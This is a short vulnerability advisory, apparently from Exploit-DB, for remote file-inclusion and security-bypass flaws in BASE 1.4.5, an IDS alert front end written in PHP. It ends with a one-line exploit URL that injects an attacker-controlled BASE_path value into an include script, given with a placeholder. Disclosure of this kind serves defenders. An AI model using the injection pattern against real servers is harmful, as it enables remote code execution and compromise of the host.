Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_html.inc.php?base_path' Remote File Inclusion

EDB-ID:

36717


Platform:

PHP

Published:

2012-02-11

source: http://www.securityfocus.com/bid/51979/info
               
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
               
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
               
BASE 1.4.5 is vulnerable; other versions may be affected. 

Exploit: http://www.example.com/base/includes/base_output_html.inc.php?BASE_path=[EV!L]